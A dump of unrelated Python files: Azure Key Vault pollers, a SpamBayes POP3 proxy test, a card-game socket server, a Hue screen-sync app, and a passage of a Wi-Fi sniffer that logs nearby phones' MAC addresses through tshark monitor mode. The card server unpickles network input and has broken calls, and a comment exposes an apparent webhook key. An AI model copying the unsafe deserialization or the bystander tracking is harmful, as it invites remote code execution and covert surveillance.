if value and isinstance(value, string_types):
result[key] = value.strip()
return result
@contextmanager
def capture_std_streams(stdout, stderr=None):
_stdout = sys.stdout
_stderr = sys.stderr
sys.stdout = stdout
sys.stderr = stderr or stdout
yield
sys.stdout = _stdout
sys.stderr = _stderr
def is_ci():
return os.getenv("CI", "").lower() == "true"
def is_container():
if os.path.exists("/.dockerenv"):
return True
if not os.path.isfile("/proc/1/cgroup"):
return False
with open("/proc/1/cgroup", encoding="utf8") as fp:
return ":/docker/" in fp.read()
def get_pythonexe_path():
return os.environ.get("PYTHONEXEPATH", os.path.normpath(sys.executable))
def copy_pythonpath_to_osenv():
_PYTHONPATH = []
if "PYTHONPATH" in os.environ:
_PYTHONPATH = os.environ.get("PYTHONPATH").split(os.pathsep)
for p in os.sys.path:
conditions = [p not in _PYTHONPATH]
if not IS_WINDOWS:
conditions.append(
os.path.isdir(os.path.join(p, "click"))
or os.path.isdir(os.path.join(p, "platformio"))
)
if all(conditions):
_PYTHONPATH.append(p)
os.environ["PYTHONPATH"] = os.pathsep.join(_PYTHONPATH)
def where_is_program(program, envpath=None):
env = os.environ
if envpath:
env["PATH"] = envpath
# try OS's built-in commands
try:
result = exec_command(["where" if IS_WINDOWS else "which", program], env=env)
if result["returncode"] == 0 and os.path.isfile(result["out"].strip()):
return result["out"].strip()
except OSError:
pass
# look up in $PATH
for bin_dir in env.get("PATH", "").split(os.pathsep):
if os.path.isfile(os.path.join(bin_dir, program)):
return os.path.join(bin_dir, program)
if os.path.isfile(os.path.join(bin_dir, "%s.exe" % program)):
return os.path.join(bin_dir, "%s.exe" % program)
return program
def append_env_path(name, value):
cur_value = os.environ.get(name) or ""
if cur_value and value in cur_value.split(os.pathsep):
return cur_value
os.environ[name] = os.pathsep.join([cur_value, value])
return os.environ[name]
def force_exit(code=0):
os._exit(code) # pylint: disable=protected-access
|
_polling.py
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller, NoPolling
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
"""Poller for long running operations where calling result() doesn't wait for operation to complete.
"""
# pylint: disable=arguments-differ
def __init__(self, polling_method):
# type: (PollingMethod) -> None
super(KeyVaultOperationPoller, self).__init__(None, None, None, NoPolling())
self._polling_method = polling_method
# pylint: disable=arguments-differ
def result(self):
# type: () -> Any
"""Returns a representation of the final resource without waiting for the operation to complete.
:returns: The deserialized resource of the long running operation
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a number of seconds.
You can check if this call has ended with timeout with the "done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start), name="KeyVaultOperationPoller({})".format(uuid.uuid4())
)
self._thread.daemon = True
self._thread.start()
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
raise self._exception # type: ignore
except TypeError: # Was None
pass
class DeleteRecoverPollingMethod(PollingMethod):
"""Poller for deleting resources, and recovering deleted resources, in vaults with soft-delete enabled.
This works by polling for the existence of the deleted or recovered resource. When a resource is deleted, Key Vault
immediately removes it from its collection. However, the resource will not immediately appear in the deleted
collection. Key Vault will therefore respond 404 to GET requests for the deleted resource; when it responds 2xx,
the resource exists in the deleted collection i.e. its deletion is complete.
Similarly, while recovering a deleted resource, Key Vault will respond 404 to GET requests for the non-deleted
resource; when it responds 2xx, the resource exists in the non-deleted collection, i.e. its recovery is complete.
"""
def __init__(self, command, final_resource, finished, interval=2):
self._command = command
self._resource = final_resource
self._polling_interval = interval
self._finished = finished
def _update_status(self):
# type: () -> None
try:
self._command()
self._finished = True
except ResourceNotFoundError:
pass
except HttpResponseError as e:
# If we are polling on get_deleted_* and we don't have get permissions, we will get
# ResourceNotFoundError until the resource is recovered, at which point we'll get a 403.
if e.status_code == 403:
self._finished = True
else:
raise
def initialize(self, client, initial_response, deserialization_callback):
pass
def run(self):
# type: () -> None
try:
while not self.finished():
self._update_status()
if not self.finished():
time.sleep(self._polling_interval)
except Exception as e:
logger.warning(str(e))
raise
def finished(self):
# type: () -> bool
return self._finished
def resource(self):
# type: () -> Any
return self._resource
def status(self):
# type: () -> str
return "finished" if self._finished else "polling"
|
test_sb_server.py
|
#! /usr/bin/env python
"""Test the POP3 proxy is working correctly.
Given no command line options, carries out a test that the
POP3 proxy can be connected to, that incoming mail is classified,
that pipelining is removed from the CAPA[bility] query, and that the
web ui is present.
The -t option runs a fake POP3 server on port 8110. This is the
same server that test uses, and may be separately run for other
testing purposes.
Usage:
test_sb-server.py [options]
options:
-t : Runs a fake POP3 server on port 8110 (for testing).
-h : Displays this help message.
"""
# This module is part of the spambayes project, which is Copyright 2002-5
# The Python Software Foundation and is covered by the Python Software
# Foundation license.
__author__ = "Richie Hindle <richie@entrian.com>"
__credits__ = "All the Spambayes folk."
# This code originally formed a part of pop3proxy.py. If you are examining
# the history of this file, you may need to go back to there.
todo = """
Web training interface:
o Functional tests.
"""
# One example of spam and one of ham - both are used to train, and are
# then classified. Not a good test of the classifier, but a perfectly
# good test of the POP3 proxy. The bodies of these came from the
# spambayes project, and Richie added the headers because the
# originals had no headers.
spam1 = """From: friend@public.com
Subject: Make money fast
Hello tim_chandler , Want to save money ?
Now is a good time to consider refinancing. Rates are low so you can cut
your current payments and save money.
http://64.251.22.101/interest/index%38%30%300%2E%68t%6D
Take off list on site [s5]
"""
good1 = """From: chris@example.com
Subject: ZPT and DTML
Jean Jordaan wrote:
> 'Fraid so ;> It contains a vintage dtml-calendar tag.
> http://www.zope.org/Members/teyc/CalendarTag
>
> Hmm I think I see what you mean: one needn't manually pass on the
> namespace to a ZPT?
Yeah, Page Templates are a bit more clever, sadly, DTML methods aren't :-(
Chris
"""
# An example of a particularly nasty malformed message - where there is
# no body, and no separator, which would at one point slip through
# SpamBayes. This is an example that Tony made up.
malformed1 = """From: ta-meyer@ihug.co.nz
Subject: No body, and no separator"""
import asyncore
import socket
import operator
import re
import time
import getopt
import sys, os
import sb_test_support
sb_test_support.fix_sys_path()
from spambayes import Dibbler
from spambayes import tokenizer
from spambayes.UserInterface import UserInterfaceServer
from spambayes.ProxyUI import ProxyUserInterface
from sb_server import BayesProxyListener
from sb_server import state, _recreateState
from spambayes.Options import options
# HEADER_EXAMPLE is the longest possible header - the length of this one
# is added to the size of each message.
HEADER_EXAMPLE = '%s: xxxxxxxxxxxxxxxxxxxx\r\n' % \
options["Headers", "classification_header_name"]
# Our simulated slow POP3 server transmits about 100 characters per second.
PER_CHAR_DELAY = 0.01
class Listener(Dibbler.Listener):
"""Listener for TestPOP3Server. Works on port 8110, to co-exist
with real POP3 servers."""
def __init__(self, socketMap=asyncore.socket_map):
Dibbler.Listener.__init__(self, 8110, TestPOP3Server,
(socketMap,), socketMap=socketMap)
class TestPOP3Server(Dibbler.BrighterAsyncChat):
"""Minimal POP3 server, for testing purposes. Doesn't support
UIDL. USER, PASS, APOP, DELE and RSET simply return "+OK"
without doing anything. Also understands the 'KILL' command, to
kill it, and a 'SLOW' command, to change to really slow retrieval.
The mail content is the example messages above.
"""
def __init__(self, clientSocket, socketMap):
# Grumble: asynchat.__init__ doesn't take a 'map' argument,
# hence the two-stage construction.
Dibbler.BrighterAsyncChat.__init__(self, map=socketMap)
Dibbler.BrighterAsyncChat.set_socket(self, clientSocket, socketMap)
self.maildrop = [spam1, good1, malformed1]
self.set_terminator('\r\n')
self.okCommands = ['USER', 'PASS', 'APOP', 'NOOP', 'SLOW',
'DELE', 'RSET', 'QUIT', 'KILL']
self.handlers = {'CAPA': self.onCapa,
'STAT': self.onStat,
'LIST': self.onList,
'RETR': self.onRetr,
'TOP': self.onTop}
self.push("+OK ready\r\n")
self.request = ''
self.push_delay = 0.0 # 0.02 is a useful value for testing.
def collect_incoming_data(self, data):
"""Asynchat override."""
self.request = self.request + data
def found_terminator(self):
"""Asynchat override."""
if ' ' in self.request:
command, args = self.request.split(None, 1)
else:
command, args = self.request, ''
command = command.upper()
if command in self.okCommands:
self.push("+OK (we hope)\r\n")
if command == 'QUIT':
self.close_when_done()
elif command == 'KILL':
self.socket.shutdown(2)
self.close()
raise SystemExit
elif command == 'SLOW':
self.push_delay = PER_CHAR_DELAY
else:
handler = self.handlers.get(command, self.onUnknown)
self.push_slowly(handler(command, args))
self.request = ''
def push_slowly(self, response):
"""Sometimes we push out the response slowly to try and generate
timeouts. If the delay is 0, this just does a regular push."""
if self.push_delay:
for c in response.split('\n'):
if c and c[-1] == '\r':
self.push(c + '\n')
else:
# We want to trigger onServerLine, so need the '\r',
# so modify the message just a wee bit.
self.push(c + '\r\n')
time.sleep(self.push_delay * len(c))
else:
self.push(response)
def onCapa(self, command, args):
"""POP3 CAPA command. This lies about supporting pipelining for
test purposes - the POP3 proxy *doesn't* support pipelining, and
we test that it correctly filters out that capability from the
proxied capability list. Ditto for STLS."""
lines = ["+OK Capability list follows",
"PIPELINING",
"STLS",
"TOP",
".",
""]
return '\r\n'.join(lines)
def onStat(self, command, args):
"""POP3 STAT command."""
maildropSize = reduce(operator.add, map(len, self.maildrop))
maildropSize += len(self.maildrop) * len(HEADER_EXAMPLE)
return "+OK %d %d\r\n" % (len(self.maildrop), maildropSize)
def onList(self, command, args):
"""POP3 LIST command, with optional message number argument."""
if args:
try:
number = int(args)
except ValueError:
number = -1
if 0 < number <= len(self.maildrop):
return "+OK %d\r\n" % len(self.maildrop[number-1])
else:
return "-ERR no such message\r\n"
else:
returnLines = ["+OK"]
for messageIndex in range(len(self.maildrop)):
size = len(self.maildrop[messageIndex])
returnLines.append("%d %d" % (messageIndex + 1, size))
returnLines.append(".")
return '\r\n'.join(returnLines) + '\r\n'
def _getMessage(self, number, maxLines):
"""Implements the POP3 RETR and TOP commands."""
if 0 < number <= len(self.maildrop):
message = self.maildrop[number-1]
try:
headers, body = message.split('\n\n', 1)
except ValueError:
return "+OK %d octets\r\n%s\r\n.\r\n" % (len(message),
message)
bodyLines = body.split('\n')[:maxLines]
message = headers + '\r\n\r\n' + '\n'.join(bodyLines)
return "+OK\r\n%s\r\n.\r\n" % message
else:
return "-ERR no such message\r\n"
def onRetr(self, command, args):
"""POP3 RETR command."""
try:
number = int(args)
except ValueError:
number = -1
return self._getMessage(number, 12345)
def onTop(self, command, args):
"""POP3 RETR command."""
try:
number, lines = map(int, args.split())
except ValueError:
number, lines = -1, -1
return self._getMessage(number, lines)
def onUnknown(self, command, args):
"""Unknown POP3 command."""
return "-ERR Unknown command: %s\r\n" % repr(command)
def helper():
"""Runs a self-test using TestPOP3Server, a minimal POP3 server
that serves the example emails above.
"""
# Run a proxy and a test server in separate threads with separate
# asyncore environments.
import threading
state.isTest = True
testServerReady = threading.Event()
def runTestServer():
testSocketMap = {}
Listener(socketMap=testSocketMap)
testServerReady.set()
asyncore.loop(map=testSocketMap)
proxyReady = threading.Event()
def runUIAndProxy():
httpServer = UserInterfaceServer(8881)
proxyUI = ProxyUserInterface(state, _recreateState)
httpServer.register(proxyUI)
BayesProxyListener('localhost', 8110, ('', 8111))
state.bayes.learn(tokenizer.tokenize(spam1), True)
state.bayes.learn(tokenizer.tokenize(good1), False)
proxyReady.set()
Dibbler.run()
testServerThread = threading.Thread(target=runTestServer)
testServerThread.setDaemon(True)
testServerThread.start()
testServerReady.wait()
proxyThread = threading.Thread(target=runUIAndProxy)
proxyThread.setDaemon(True)
proxyThread.start()
proxyReady.wait()
# Connect to the proxy and the test server.
proxy = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy.connect(('localhost', 8111))
response = proxy.recv(100)
assert response == "+OK ready\r\n"
pop3Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pop3Server.connect(('localhost', 8110))
response = pop3Server.recv(100)
assert response == "+OK ready\r\n"
# Verify that the test server claims to support pipelining.
pop3Server.send("capa\r\n")
response = pop3Server.recv(1000)
assert response.find("PIPELINING") >= 0
# Ask for the capabilities via the proxy, and verify that the proxy
# is filtering out the PIPELINING capability.
proxy.send("capa\r\n")
response = proxy.recv(1000)
assert response.find("PIPELINING") == -1
# Verify that the test server claims to support STLS.
pop3Server.send("capa\r\n")
response = pop3Server.recv(1000)
assert response.find("STLS") >= 0
# Ask for the capabilities via the proxy, and verify that the proxy
# is filtering out the STLS capability.
proxy.send("capa\r\n")
response = proxy.recv(1000)
assert response.find("STLS") == -1
# Stat the mailbox to get the number of messages.
proxy.send("stat\r\n")
response = proxy.recv(100)
count, totalSize = map(int, response.split()[1:3])
assert count == 3
# Loop through the messages ensuring that they have judgement
# headers.
for i in range(1, count+1):
response = ""
proxy.send("retr %d\r\n" % i)
while response.find('\n.\r\n') == -1:
response = response + proxy.recv(1000)
assert response.find(options["Headers", "classification_header_name"]) >= 0
# Check that the proxy times out when it should. The consequence here
# is that the first packet we receive from the proxy will contain a
# partial message, so we assert for that. At 100 characters per second
# with a 1-second timeout, the message needs to be significantly longer
# than 100 characters to ensure that the timeout fires, so we make sure
# we use a message that's at least 200 characters long.
assert len(spam1) >= 2 * (1/PER_CHAR_DELAY)
options["pop3proxy", "retrieval_timeout"] = 1
options["Headers", "include_evidence"] = False
proxy.send("slow\r\n")
response = proxy.recv(100)
assert response.find("OK") != -1
proxy.send("retr 1\r\n")
response = proxy.recv(1000)
assert len(response) < len(spam1)
# Smoke-test the HTML UI.
httpServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
httpServer.connect(('localhost', 8881))
httpServer.sendall("get / HTTP/1.0\r\n\r\n")
response = ''
while 1:
packet = httpServer.recv(1000)
if not packet: break
response += packet
assert re.search(r"(?s)<html>.*SpamBayes proxy.*</html>", response)
# Kill the proxy and the test server.
proxy.sendall("kill\r\n")
proxy.recv(100)
pop3Server.sendall("kill\r\n")
pop3Server.recv(100)
def test_run():
# Read the arguments.
try:
opts, args = getopt.getopt(sys.argv[1:], 'ht')
except getopt.error, msg:
print >>sys.stderr, str(msg) + '\n\n' + __doc__
sys.exit()
state.isTest = True
runSelfTest = True
for opt, arg in opts:
if opt == '-h':
print >>sys.stderr, __doc__
sys.exit()
elif opt == '-t':
state.isTest = True
state.runTestServer = True
runSelfTest = False
state.createWorkers()
if runSelfTest:
print "\nRunning self-test...\n"
state.buildServerStrings()
helper()
print "Self-test passed." # ...else it would have asserted.
elif state.runTestServer:
print "Running a test POP3 server on port 8110..."
Listener()
asyncore.loop()
if __name__ == '__main__':
test_run()
|
networkServer.py
|
import socket
import threading
import math
import random
import pickle
import time
#注意引用的问题
# palyers_cards = [[],[],[]]
# def login():
def deal(palyers_cards):
colors = ("黑桃", "草花", "红桃", "方片", "王牌")
points = ("3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A", "2", "小王", "大王")
#洗牌函数,可以用取一次random,将其从序列里删去,再重新去取
card_indexs = [x for x in range(54)]
random.shuffle(card_indexs) #是直接作用,不是返回
deal_index = random.randint(0,2)
for index in card_indexs:
palyers_cards[deal_index].append(index)
deal_index+=1
deal_index = deal_index%3
# pickle.dumps()将数据序列化为二进制
# pickle.loads()将数据复原
def broadcast(players,give_index):
#由于服务器端在客户端连接之后执行速度比客户端快,所以两次发送被一次接受了
#所以使用time.sleep
while True:
time.sleep(0.1)
give_index[0] +=1
give_index[0] = give_index[0]%3
for i in range(len(players)):
players[i].send(pickle.dumps([i,give_index[0]]))
user_give_cards = pickle.loads(players[give_index[0]].recv(1024))
for i in range(len(players)):
players[i].send(pickle.dumps(user_give_cards))
def dunch_offical(players):
palyers_cards = [[],[],[]]
deal(palyers_cards)
for i in range(len(players)):
players[i].send(pickle.dumps(palyers_cards[i]))
give_index = [random.randint(0,2)]
broadcast(players,give_index)
data = pickle.loads(players[0].recv(1024))
print(data)
def main():
#接受用户登陆,注意记录用户的登陆信息(积分系统)
tables = []
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server_socket.bind(('',8888))
#这里可以绑定学校服务器,以此供给广域网使用,即可以把服务器端程序搬到学校服务器上
server_socket.listen(128)
print("服务器开始工作")
population_on_a_table = 0
table_number = 0
while True:
client_socket, client_addr = server_socket.accept()
print("接受到一个用户登陆")
population_on_a_table += 1
population_on_a_table = population_on_a_table%3
if population_on_a_table==1:
table_number +=1
tables.append([client_socket])
elif population_on_a_table==0:
tables[table_number-1].append(client_socket)
t = threading.Thread(target=dunch_offical,args=(tables[table_number-1],))
t.start()
print("{}号桌已经开桌".format(str(table_number)))
else:
tables[table_number-1].append(client_socket)
#发牌,留三张
deal()
client_socket.send(pickle.dumps(palyers_cards[1]))
#随机指定叫地主的人并且叫一轮地主
#从地主开始出牌,判断出牌是否合理,并且广播出牌(可以添加计时器)
#下家出牌,比较大小
#到再次轮到出牌者的时候,注意是按大小轮到,还是上两家都没有轮到
#判断游戏是否结束,并进行积分
if __name__ == "__main__":
main()
|
HueSync.pyw
|
from tkinter import messagebox
from threading import Thread
import cv2.cv2 as cv2
import numpy as np
import pyautogui
import requests
import tkinter
import pygubu
import atexit
import rgbxy
import json
import time
import os
class LinkButtonNotPressed(Exception):
pass
def get_bridge_ip(number=0):
return requests.get("https://discovery.meethue.com/").json()[number]["internalipaddress"]
cfile = "testconfig.json" if os.path.isfile("testconfig.json") else "config.json"
VERSION = 3.3
CONFIG = json.loads(open(cfile, "r").read())
if CONFIG["adress"].lower() == "auto":
adress = get_bridge_ip(CONFIG["bridge_number"])
else:
adress = CONFIG["adress"]
if CONFIG["user"].lower() == "create":
r = requests.post(f"http://{adress}/api/", json={"devicetype": "huesync"})
if 199 < r.status_code < 300:
j = r.json()[0]
try:
if j["error"]["type"] == 101:
raise LinkButtonNotPressed("Please press the big link button on your bridge 30s before you run this "
+ "script!")
except (KeyError, IndexError):
try:
u = j["success"]["username"]
CONFIG["user"] = u
open(cfile, "w").write(json.dumps(CONFIG))
print(f"Successfully created a user! [{u}]")
except (KeyError, IndexError):
print("Please try again! [User Creation Exception]")
exit()
username = CONFIG["user"]
baseURL = f"http://{adress}/api/{username}/"
lURL = f"{baseURL}lights/"
blackvalue = CONFIG["blackval"]
sync_lamps = [x for x in CONFIG["lamps"] if len(x) > 0]
def add_lamps_in_room(room: str):
if len(room) > 0:
for lamp in requests.get(f"{baseURL}groups/{room}/").json()["lights"]:
sync_lamps.append(lamp)
for group in CONFIG["groups"]:
add_lamps_in_room(group)
def set_all_xyb(x, y, bri, transtime=0) -> list[requests.models.Response]:
res: list[requests.models.Response] = []
for lamp in sync_lamps:
res.append(set_xyb(lamp, x, y, bri, transtime=transtime))
return res
def set_state(lamp: str, state: bool):
return requests.put(f"{lURL}{lamp}/state", json={"on": state})
def set_all_states(state: bool):
result: list[requests.models.Response] = []
for lamp in sync_lamps:
result.append(set_state(lamp, state))
return result
def get_state_list():
res = {}
for l in sync_lamps:
state = requests.get(f"{lURL}{l}/").json()["state"]
res[l] = {
"on": state["on"],
"x": state["xy"][0],
"y": state["xy"][1],
"bri": state["bri"]
}
return res
def apply_state_list(l: dict, transtime=10):
for k in l.keys():
set_xyb(k, l[k]["x"], l[k]["y"], l[k]["bri"], transtime=transtime)
set_state(k, l[k]["on"])
def set_xyb(lamp: str, x, y, bri, transtime=0) -> requests.models.Response:
return requests.put(f"{lURL}{lamp}/state/", json={"xy": [x, y], "bri": bri, "transitiontime": transtime})
def screenshot():
return np.array(pyautogui.screenshot())[:, :, ::-1].copy()
def bgr_to_rgb(bgr) -> tuple[int, int, int]:
return bgr[2], bgr[1], bgr[0]
def get_main_color_on_screen():
sc = screenshot()
data = np.reshape(sc, (-1, 3))
data = np.float32(data)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
compactness, labels, centers = cv2.kmeans(data, 1, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
rgb = bgr_to_rgb(centers[0].astype(np.int32))
return tuple(rgb)
def get_complementary(color):
if color.startswith("#"):
color = color[1:]
color = int(color, 16)
comp_color = 0xFFFFFF ^ color
comp_color = "#%06X" % comp_color
return comp_color
class UiApp:
oState = {}
oBgColor = "SystemButtonFace"
def __init__(self):
self.builder = builder = pygubu.Builder()
builder.add_resource_path(os.path.dirname(__file__))
builder.add_from_file(os.path.join(os.path.dirname(__file__), "ui.ui"))
self.mainwindow = builder.get_object('root')
builder.connect_callbacks(self)
def onStartButtonClick(self):
global run
self.oBgColor = self.builder.get_object("colorPreview")["bg"]
run = True
self.oState = get_state_list()
set_all_states(True)
self.builder.get_object("startButton")["state"] = "disable"
self.builder.get_object("stopButton")["state"] = "active"
def onStopButtonClick(self):
global run
run = False
apply_state_list(self.oState)
self.builder.get_object("colorPreview")["bg"] = self.oBgColor
self.builder.get_object("startButton")["state"] = "active"
self.builder.get_object("stopButton")["state"] = "disable"
def update_color(self, rgb):
global run
self.builder.get_object("colorPreview")["bg"] = self.oBgColor if not run else '#%02x%02x%02x' % rgb
def run(self):
self.mainwindow.mainloop()
def main():
while True:
while run:
try:
# Get Values
r, g, b = get_main_color_on_screen()
x, y = rgbxy.Converter().rgb_to_xy(r, g, b)
bri = min(CONFIG["maxbri"], int(abs(100 - (r + g + b))))
if r <= blackvalue and g <= blackvalue and b <= blackvalue:
r, g, b = 1, 1, 1
x, y = rgbxy.Converter().rgb_to_xy(r, g, b)
bri = 0
set_all_xyb(x, y, bri, transtime=CONFIG["transitiontime"])
app.update_color(tuple([min(255, v * 3) for v in (r, g, b)]))
time.sleep(1000 / CONFIG["updatespermillisecond"])
except BlockingIOError as ex:
print(ex)
def start_exiter():
time.sleep(5)
os._exit(0)
def on_exit():
Thread(target=start_exiter).start()
app.onStopButtonClick()
root.destroy()
def on_window_close():
Thread(target=start_exiter).start()
app.onStopButtonClick()
root.destroy()
os._exit(0)
def check_version():
try:
lrelease = requests.get("https://api.github.com/repos/timtrayler/hue-sync/releases/latest").json()
ltag = float(lrelease["tag_name"].replace("v", ""))
if ltag > VERSION:
messagebox.showinfo("New version avaible",
"A newer version of hue sync is avaible, please visit https://github.com/TimTrayler/hue-sync/releases/latest to download the newest version.")
except Exception:
print("Failed to check version!")
if __name__ == "__main__":
check_version()
run = False
Thread(target=main).start()
root = tkinter.Tk()
# Window
root.resizable(0, 0)
root.iconbitmap(r"icon.ico")
root.title("Hue Sync")
# Exit on tkinter exit
root.protocol("WM_DELETE_WINDOW", on_window_close)
atexit.register(on_exit)
app = UiApp()
app.run()
|
__main__.py
|
import threading
import sys
import os
import platform
import subprocess
import json
import time
import requests
import datetime
import netifaces
import click
from requests import ConnectionError
from analysis import analyze_file
from oui import oui
from colors import *
if os.name != 'nt':
from pick import pick
def which(program):
"""Determines whether program exists
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
raise Exception("Error in which program.")
def iftttpost(iphones, androids):
"""Posts data to an IFTTT channel to save in Google Sheets"""
# by Andy Maxwell 6/13/2018
report = {}
report["value1"] = datetime.datetime.now().strftime("%m-%d-%Y %H:%M:%S")
report["value2"] = iphones
report["value3"] = androids
# print(requests.post('https://maker.ifttt.com/trigger/xyz/with/key/khiN5Xs3nUOmx0ZGKrY8t',
# data=report).text)
def localhost_report(apple, androids, others, devicesCount, resolvedDevicesCount):
"""Posts data to localhost server."""
# By Nash Gadre (github: @allnash)
unix_time = long(time.time() * 1000)
report = {"apple_count": apple,
"android_count": androids,
"others_count": others,
"devices_count": devicesCount,
"resolved_devices_count": resolvedDevicesCount,
"reader_seen_time": unix_time}
try:
requests.post('http://localhost:8000/json/cellphone_sightings_metrics', json=report)
print("Cellphone probe request data posted")
except ConnectionError:
print("Error posting cellphone probe request data")
def localhost_report_real(json):
"""Posts Probe request data to localhost server."""
# By Nash Gadre (github: @allnash)
unix_time = long(time.time() * 1000)
report = {"cellphones": json, "reader_seen_time": unix_time}
try:
requests.post('http://localhost:8000/json/cellphone_sightings', json=report)
print("Cellphone sighting data posted")
except ConnectionError:
print("Error posting cellphone sighting data")
def showTimer(timeleft):
"""Shows a countdown timer"""
total = int(timeleft) * 10
for i in range(total):
sys.stdout.write('\r')
# the exact output you're looking for:
timeleft_string = '%ds left' % int((total - i + 1) / 10)
if (total - i + 1) > 600:
timeleft_string = '%dmin %ds left' % (
int((total - i + 1) / 600), int((total - i + 1) / 10 % 60))
sys.stdout.write("[%-50s] %d%% %15s" %
('=' * int(50.5 * i / total), 101 * i / total, timeleft_string))
sys.stdout.flush()
time.sleep(0.1)
print("")
def fileToMacSet(path):
with open(path, 'r') as f:
maclist = f.readlines()
return set([x.strip() for x in maclist])
@click.command()
@click.option('-a', '--adapter', default='', help='adapter to use')
@click.option('-z', '--analyze', default='', help='analyze file')
@click.option('-s', '--scantime', default='60', help='time in seconds to scan')
@click.option('-o', '--out', default='', help='output cellphone data to file')
@click.option('-v', '--verbose', help='verbose mode', is_flag=True)
@click.option('--number', help='just print the number', is_flag=True)
@click.option('-j', '--jsonprint', help='print JSON of cellphone data', is_flag=True)
@click.option('-n', '--nearby', help='only quantify signals that are nearby (rssi > -80) and '
'distinct devices (rssi > -120)', is_flag=True)
@click.option('--allmacaddresses',
help='do not check MAC addresses against the OUI database to only recognize known cellphone manufacturers',
is_flag=True) # noqa
@click.option('--nocorrection', help='do not apply correction', is_flag=True)
@click.option('--loop', help='loop forever', is_flag=True)
@click.option('--port', default=8001, help='port to use when serving analysis')
@click.option('--sort', help='sort cellphone data by distance (rssi)', is_flag=True)
@click.option('--targetmacs', help='read a file that contains target MAC addresses', default='')
def main(adapter, scantime, verbose, number, nearby, jsonprint, out, allmacaddresses, nocorrection, loop, analyze, port,
sort, targetmacs):
if analyze != '':
analyze_file(analyze, port)
return
if loop:
while True:
adapter = scan(adapter, scantime, verbose, number,
nearby, jsonprint, out, allmacaddresses, nocorrection, loop, sort, targetmacs)
else:
scan(adapter, scantime, verbose, number,
nearby, jsonprint, out, allmacaddresses, nocorrection, loop, sort, targetmacs)
def scan(adapter, scantime, verbose, number, nearby, jsonprint, out, allmacaddresses, nocorrection, loop, sort,
targetmacs):
"""Monitor wifi signals to count the number of people around you"""
# print("OS: " + os.name)
# print("Platform: " + platform.system())
try:
tshark = which("tshark")
except:
if platform.system() != 'Darwin':
print('tshark not found, install using\n\napt-get install tshark\n')
else:
print('wireshark not found, install using: \n\tbrew install wireshark')
print(
'you may also need to execute: \n\tbrew cask install wireshark-chmodbpf')
return
if jsonprint:
number = True
if number:
verbose = False
if len(adapter) == 0:
if os.name == 'nt':
print('You must specify the adapter with -a ADAPTER')
print('Choose from the following: ' +
', '.join(netifaces.interfaces()))
return
title = 'Please choose the adapter you want to use: '
adapter, index = pick(netifaces.interfaces(), title)
# print("Using %s adapter and scanning for %s seconds..." %
# (adapter, scantime))
if not number:
# Start timer
t1 = threading.Thread(target=showTimer, args=(scantime,))
t1.daemon = True
t1.start()
# Scan with tshark
command = [tshark, '-I', '-i', adapter, '-a',
'duration:' + scantime, '-w', '/tmp/tshark-temp']
if verbose:
print(' '.join(command))
run_tshark = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, nothing = run_tshark.communicate()
if not number:
t1.join()
# Read tshark output for chatter coming from cellphones.
full_spectrum_command = [
tshark, '-r',
'/tmp/tshark-temp',
'-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.bssid', '-e',
'radiotap.dbm_antsignal'
]
# Read tshark output for probe requests.
probe_spectrum_command = [
tshark, '-r',
'/tmp/tshark-temp',
'-Y', 'wlan.fc.type == 0 && wlan.fc.type_subtype == 4',
'-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.bssid', '-e',
'radiotap.dbm_antsignal'
]
# Read tshark output for QoS data Null frames.
device_resolution_command = [
tshark, '-r',
'/tmp/tshark-temp',
# '-Y', 'wlan.fc.type_subtype == 0x0000 || wlan.fc.type_subtype == 0x000A',
'-Y',
'wlan.fc.type_subtype == 44 || wlan.fc.type_subtype == 36',
'-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.da', '-e',
'radiotap.dbm_antsignal'
]
run_tshark_full_spectrum = subprocess.Popen(
full_spectrum_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output_full_sepctrum, nothing = run_tshark_full_spectrum.communicate()
run_tshark_probe = subprocess.Popen(
probe_spectrum_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output_probe, nothing = run_tshark_probe.communicate()
run_tshark_device_resolution = subprocess.Popen(
device_resolution_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output_resolution, nothing = run_tshark_device_resolution.communicate()
# read target MAC address
targetmacset = set()
if targetmacs != '':
targetmacset = fileToMacSet(targetmacs)
foundFullSpectrumMacs = {}
foundProbeMacs = {}
foundRealDeviceMacs = {}
for line in output_full_sepctrum.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split()
if len(dats) == 3:
